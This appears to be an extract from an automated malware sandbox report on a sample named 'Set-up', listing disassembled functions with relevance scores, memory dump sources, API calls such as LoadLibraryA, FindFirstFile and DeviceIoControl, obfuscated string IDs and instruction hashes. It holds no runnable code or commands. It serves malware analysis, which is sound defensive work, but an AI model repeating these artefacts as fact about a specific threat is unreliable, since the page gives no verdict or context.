                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: +$0$5$8$;$M$Q$V$n$p$t$x$~
                                                                                                                                                  • API String ID: 0-2101947778
                                                                                                                                                  • Opcode ID: 9e3cc43065536aba71e4522b174f673995bc24f7ed32f5e3673851162d1488cc
                                                                                                                                                  • Instruction ID: faea19e4f3ee39603092b8e1e31464c6c2d55079bc79675b2177d88c8c6ec266
                                                                                                                                                  • Opcode Fuzzy Hash: 9e3cc43065536aba71e4522b174f673995bc24f7ed32f5e3673851162d1488cc
                                                                                                                                                  • Instruction Fuzzy Hash: 8782D47160C7818BD768DF38C4553AEBBE6ABC6310F188A6DE4DAC7781DA788545CB03
                                                                                                                                                  Function 00692849 Relevance: 14.3, Strings: 11, Instructions: 594COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: H$L$R$X$Y$\$]$b$e$o$u
                                                                                                                                                  • API String ID: 0-3293963407
                                                                                                                                                  • Opcode ID: 629a7586417e11de94fc3bed3a8fa46ca99d91ef8292f3c5d3ba24b48ce1c4df
                                                                                                                                                  • Instruction ID: c1b5e1e0fc6cbf2c66db48425649ba66766559230f4c50188e2b30731643c35b
                                                                                                                                                  • Opcode Fuzzy Hash: 629a7586417e11de94fc3bed3a8fa46ca99d91ef8292f3c5d3ba24b48ce1c4df
                                                                                                                                                  • Instruction Fuzzy Hash: DE32F77260C7918FD724DF38C4953AEBBE6AFC5320F198A2DE8D987781D67489058B43
                                                                                                                                                  Function 0068C23E Relevance: 14.1, Strings: 11, Instructions: 397COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: !$gsf}$nm58$tk$b6`$fd$j>h$n<l$q9$rp$zx
                                                                                                                                                  • API String ID: 0-3075877772
                                                                                                                                                  • Opcode ID: 8068924df7d453fa80d1f2c3978f0f56409acb30b62bec71ae9f023ecdcbb8fe
                                                                                                                                                  • Instruction ID: b3e006a2ce49a5156d68c0ff3939266bbd0a41f08c410f6245d74e0cfa988de6
                                                                                                                                                  • Opcode Fuzzy Hash: 8068924df7d453fa80d1f2c3978f0f56409acb30b62bec71ae9f023ecdcbb8fe
                                                                                                                                                  • Instruction Fuzzy Hash: C4C14772B4C3504BC724EF2884512AFFBD39BC1320F1D8A2DE4D55B345EA75890ADBA6
                                                                                                                                                  Function 004716D4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,004708E5,?,Microsoft Visual C++ Runtime Library,00012010,?,0047CFDC,?,0047D02C,?,?,?,Runtime Error!Program: ), ref: 004716E6
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004716FE
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0047170F
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0047171C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                  • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                                                                                  • API String ID: 2238633743-4044615076
                                                                                                                                                  • Opcode ID: f125fcbf0fee655512f86ecf22a5b49b386ac9a16d47b26feedca856e97d2195
                                                                                                                                                  • Instruction ID: 03b784820acf36e0d5b112930b3f3e770f5cd8d131891af01fb093e386284952
                                                                                                                                                  • Opcode Fuzzy Hash: f125fcbf0fee655512f86ecf22a5b49b386ac9a16d47b26feedca856e97d2195
                                                                                                                                                  • Instruction Fuzzy Hash: C9017131600301BB87109FB9AC84A9B7AB8EA9D761711883BF509D3221E678C9519B69
                                                                                                                                                  Function 006B94BE Relevance: 13.2, Strings: 10, Instructions: 654COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: X,^$Tuj$!d<z$"\;R$&D9Z$(x.~$6P'V$WT$\$\]^_
                                                                                                                                                  • API String ID: 0-2679386696
                                                                                                                                                  • Opcode ID: ce75bc5280868d48a70c87ba81e8fe79248b11eaeb1aa40c134f5f8797cf4a3e
                                                                                                                                                  • Instruction ID: 08d81f7beef9190cd16290b1c784d9c531ace1e45db77b833b4b6afbf176860a
                                                                                                                                                  • Opcode Fuzzy Hash: ce75bc5280868d48a70c87ba81e8fe79248b11eaeb1aa40c134f5f8797cf4a3e
                                                                                                                                                  • Instruction Fuzzy Hash: C922FFB26083009FD714CF25C841BABBBE2EFC5714F188A2DE6959B291DB75D842CB52
                                                                                                                                                  Function 006A36AE Relevance: 13.0, Strings: 10, Instructions: 550COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $!$!@$&$,$L$M$N$O$s
                                                                                                                                                  • API String ID: 0-659037545
                                                                                                                                                  • Opcode ID: 1b24b55bd2d98d8d417b75fe6a997a600d89fa01a4e7b94792926a4dae59bbab
                                                                                                                                                  • Instruction ID: fc8027c3569ca0ca869ce8b3854e6fd426cfb3b77c14486c40c16ae5040be85f
                                                                                                                                                  • Opcode Fuzzy Hash: 1b24b55bd2d98d8d417b75fe6a997a600d89fa01a4e7b94792926a4dae59bbab
                                                                                                                                                  • Instruction Fuzzy Hash: 0422F57160C7A08FD324AB28C45036EBBD2AF86324F188A6EF5D5873D2D7798945CB07
                                                                                                                                                  Function 0068AE2E Relevance: 9.2, Strings: 7, Instructions: 451COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: JCzK$Jsx}$O$[@#$e@#$rGyD$
                                                                                                                                                  • API String ID: 0-1983846096
                                                                                                                                                  • Opcode ID: c8a4e0418af1c7a1d3b4a903dd315ee5dfa0423e0a724264cb78d25a29d1a60d
                                                                                                                                                  • Instruction ID: 796c9eb3902c79848c8cc93481313a0072c15aa61a78814fe0c8926c628b5b78
                                                                                                                                                  • Opcode Fuzzy Hash: c8a4e0418af1c7a1d3b4a903dd315ee5dfa0423e0a724264cb78d25a29d1a60d
                                                                                                                                                  • Instruction Fuzzy Hash: C1D146726483408FD328DF64C8516ABBBE2EFC5304F188A3DE5E59B351D779C9068B46
                                                                                                                                                  Function 00430F98 Relevance: 8.7, APIs: 3, Strings: 1, Instructions: 1652COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00430F9D
                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004315C7
                                                                                                                                                    • Part of subcall function 0042AF58: __EH_prolog.LIBCMT ref: 0042AF5D
                                                                                                                                                    • Part of subcall function 00427FF7: __EH_prolog.LIBCMT ref: 00427FFC
                                                                                                                                                    • Part of subcall function 00427AD2: __EH_prolog.LIBCMT ref: 00427AD7
                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0043155F
                                                                                                                                                    • Part of subcall function 004331F5: __EH_prolog.LIBCMT ref: 004331FA
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog$FreeString
                                                                                                                                                  • String ID: )
                                                                                                                                                  • API String ID: 397689101-2427484129
                                                                                                                                                  • Opcode ID: 66ae192ca94e929d363032ca5ed6df6dd29a866ddee8f685c5fb873ab73fc87d
                                                                                                                                                  • Instruction ID: 55e50db3bde0b93fa2859163b83da77aa776ba8142f5ffca2a3a6a21f7676ec7
                                                                                                                                                  • Opcode Fuzzy Hash: 66ae192ca94e929d363032ca5ed6df6dd29a866ddee8f685c5fb873ab73fc87d
                                                                                                                                                  • Instruction Fuzzy Hash: 06037B30904259DFDB15DFA4C984BEDBBB0BF58308F14809EE80967292DB78AE45CF65
                                                                                                                                                  Function 006B8BDE Relevance: 7.7, Strings: 6, Instructions: 247COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 8$8$9$9$:$:
                                                                                                                                                  • API String ID: 0-1811065620
                                                                                                                                                  • Opcode ID: 2b10ca1e912bf5d38e4d2a778b46d5ca3d6dd4a67a15562ef3a98cf72f0bc413
                                                                                                                                                  • Instruction ID: e4ed8889fdf37271a43977dae774a845936885a3ad2e03fb08dfc09fbeb9219a
                                                                                                                                                  • Opcode Fuzzy Hash: 2b10ca1e912bf5d38e4d2a778b46d5ca3d6dd4a67a15562ef3a98cf72f0bc413
                                                                                                                                                  • Instruction Fuzzy Hash: 1A914872A087D48FDB02CABCC8406EE7FA75BA7260F1D8295D4A19B3D6C6358907C761
                                                                                                                                                  Function 0068A9AE Relevance: 6.7, Strings: 5, Instructions: 436COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: \$]$nPTO$q|$uws
                                                                                                                                                  • API String ID: 0-364134478
                                                                                                                                                  • Opcode ID: 5a56bc40129c12e6e675d48b8044640103d0c2ab49d18cdc3d306846cb285dcd
                                                                                                                                                  • Instruction ID: 5957c6e39b455a67e5fff18731c42df2a0df030b764dd8511828b17da07dd32f
                                                                                                                                                  • Opcode Fuzzy Hash: 5a56bc40129c12e6e675d48b8044640103d0c2ab49d18cdc3d306846cb285dcd
                                                                                                                                                  • Instruction Fuzzy Hash: E3C1297054C3D18BD326DF7988903AABFE1AF93204F0886ADE8D58B742D625C909C793
                                                                                                                                                  Function 006ACEDE Relevance: 6.5, Strings: 5, Instructions: 265COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $;J$$$O$2[&%$d_$h
                                                                                                                                                  • API String ID: 0-2343494447
                                                                                                                                                  • Opcode ID: cd1948c1564e5a044629e6db35d8d28aabe4d8e906e0bb4e8cc043bb17311e1c
                                                                                                                                                  • Instruction ID: 07ed5d8df75a2d5e18d964bdfb7040b80c3da1ab8fd8316dad41e69c21b1d0ee
                                                                                                                                                  • Opcode Fuzzy Hash: cd1948c1564e5a044629e6db35d8d28aabe4d8e906e0bb4e8cc043bb17311e1c
                                                                                                                                                  • Instruction Fuzzy Hash: B791F0B690E3E08BD735DF2588903DABBE2ABD7300F198A5CC8D91B745CB354905CB92
                                                                                                                                                  Function 0069A795 Relevance: 6.4, Strings: 5, Instructions: 170COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: IK$-E*G$4A0C$5M=O$8U$W
                                                                                                                                                  • API String ID: 0-3368978884
                                                                                                                                                  • Opcode ID: 40a3c90cdef32a88a17be069de21465ccc6ccbe9e824139b187e315834951677
                                                                                                                                                  • Instruction ID: 3a7cf4d0a7e174c920793e927dc75eec11ca0bd790289dc76c32358888d3fa74
                                                                                                                                                  • Opcode Fuzzy Hash: 40a3c90cdef32a88a17be069de21465ccc6ccbe9e824139b187e315834951677
                                                                                                                                                  • Instruction Fuzzy Hash: B96176B65193858BD7388F2588923EBBBF2AFC2310F559A1DC5DC4B394EB344102CB86
                                                                                                                                                  Function 0040A326 Relevance: 6.1, APIs: 4, Instructions: 75fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040A32B
                                                                                                                                                    • Part of subcall function 0040A306: FindClose.KERNEL32(00000000,?,0040A33F,?), ref: 0040A311
                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?,?), ref: 0040A366
                                                                                                                                                    • Part of subcall function 0040A46F: __EH_prolog.LIBCMT ref: 0040A474
                                                                                                                                                  • FindFirstFileW.KERNEL32(000000FF,?,?,?), ref: 0040A39D
                                                                                                                                                  • FindFirstFileW.KERNEL32(00000002,?,00000003,?,?), ref: 0040A3D5
                                                                                                                                                    • Part of subcall function 004077C9: __EH_prolog.LIBCMT ref: 004077CE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Find$FileFirstH_prolog$Close
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3335342080-0
                                                                                                                                                  • Opcode ID: 93edfc412da073c259e67a16ef3f2889237f69dc041aee4828ddcd9f86077aeb
                                                                                                                                                  • Instruction ID: 6a200a5ec5d7373b00856f3de2735c03a490f03ca145da7cddf519ce353b4b94
                                                                                                                                                  • Opcode Fuzzy Hash: 93edfc412da073c259e67a16ef3f2889237f69dc041aee4828ddcd9f86077aeb
                                                                                                                                                  • Instruction Fuzzy Hash: BA218D7180030A9FCB10EFA4C9819AEB774EF10328F10467EE991B72D1D7385A95DF96
                                                                                                                                                  Function 006AE805 Relevance: 5.4, Strings: 4, Instructions: 385COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ]$qkrh$uqT^$uqT^
                                                                                                                                                  • API String ID: 0-2178738942
                                                                                                                                                  • Opcode ID: ef0f00bf9d89bcb2dccdb7778b9b516b20b323598f0f1bb1660b8671dcd639f8
                                                                                                                                                  • Instruction ID: cd1da65e27fb81f4bf789c9f044f6adf886ed6a20db615e0211a0696823bfb15
                                                                                                                                                  • Opcode Fuzzy Hash: ef0f00bf9d89bcb2dccdb7778b9b516b20b323598f0f1bb1660b8671dcd639f8
                                                                                                                                                  • Instruction Fuzzy Hash: 01B1037190C3818BD739CF6984503ABBBD2AFE7301F1889ADD0C997342D678890A8B56
                                                                                                                                                  Function 0040A911 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040A916
                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000105,00000000,00000003,75923220,00000002,00000000), ref: 0040A9D4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CurrentDirectoryH_prolog
                                                                                                                                                  • String ID: \\?\
                                                                                                                                                  • API String ID: 1365920442-4282027825
                                                                                                                                                  • Opcode ID: 64cf4edc2a30621b89928218fdd3293bb144456b2e7b0c06e2e75b4925b2a9cd
                                                                                                                                                  • Instruction ID: bb1f149a2e02795a9a8a9760b0b863e3b8fe5f3dd2ec99aff929411e55c5b8fd
                                                                                                                                                  • Opcode Fuzzy Hash: 64cf4edc2a30621b89928218fdd3293bb144456b2e7b0c06e2e75b4925b2a9cd
                                                                                                                                                  • Instruction Fuzzy Hash: 414177B0E002059ADF24AB99D909AEFB6B4EF04308F10843FE415B22D1D7785A95CB6B
                                                                                                                                                  Function 0069DDE2 Relevance: 5.3, Strings: 4, Instructions: 272COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 01$Sp0v$c`$|r
                                                                                                                                                  • API String ID: 0-501639292
                                                                                                                                                  • Opcode ID: 7a04ff4bb80d7d49d2862254d0fae8460f622d27709ec53bd254e19bbfd9ef05
                                                                                                                                                  • Instruction ID: 2a36a91bb9e7b28a8c223501ea96efaf09c7e2596e1739f7f9c4dca584673615
                                                                                                                                                  • Opcode Fuzzy Hash: 7a04ff4bb80d7d49d2862254d0fae8460f622d27709ec53bd254e19bbfd9ef05
                                                                                                                                                  • Instruction Fuzzy Hash: 70912672A5D3404BD714DF66CC8216BFBE3EBD1304F09992CE49597701D679C60ACB8A
                                                                                                                                                  Function 006AD75A Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: =]Qb$=]Qb$A\hV$D
                                                                                                                                                  • API String ID: 0-3858663925
                                                                                                                                                  • Opcode ID: 4b01b1de75f1331a32b0e76f98a5f46ccd5c2ace1ceec5172429e2d5eda47058
                                                                                                                                                  • Instruction ID: ff5e09b957afa2b7a70ad0496ef4d37212f4d7c3b814092665f60db38408b9f5
                                                                                                                                                  • Opcode Fuzzy Hash: 4b01b1de75f1331a32b0e76f98a5f46ccd5c2ace1ceec5172429e2d5eda47058
                                                                                                                                                  • Instruction Fuzzy Hash: 9A412B2450E3E04BDB359B3984643FBBBE19F97300F58899DC4EB9B682C7384806DB56
                                                                                                                                                  Function 006AE2D9 Relevance: 5.2, Strings: 4, Instructions: 173COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: =]Qb$=]Qb$A\hV$D
                                                                                                                                                  • API String ID: 0-3858663925
                                                                                                                                                  • Opcode ID: 0c0a05dfb651b4e2fe3b02c1993ca1a12b4be99aab263749b0dbf5d2bb995b72
                                                                                                                                                  • Instruction ID: 7e54d2aa24be635aab1782f5836bc5e4eb97a5e7bb3d09b8e708d1eb05ba6c1a
                                                                                                                                                  • Opcode Fuzzy Hash: 0c0a05dfb651b4e2fe3b02c1993ca1a12b4be99aab263749b0dbf5d2bb995b72
                                                                                                                                                  • Instruction Fuzzy Hash: 3E410B3450E3E04BDB359B3584683F6BFE19F57204F18859DC4EA9B682D6394406CF16
                                                                                                                                                  Function 0040AC8A Relevance: 4.6, APIs: 3, Instructions: 83COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,00074004,00000000,00000000,?,00000020,?,00000000), ref: 0040ACCE
                                                                                                                                                  • DeviceIoControl.KERNEL32(000000FF,00070000,00000000,00000000,?,00000018,?,00000000), ref: 0040ACF6
                                                                                                                                                  • DeviceIoControl.KERNEL32(000000FF,0002404C,00000000,00000000,?,00000018,?,00000000), ref: 0040AD10
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
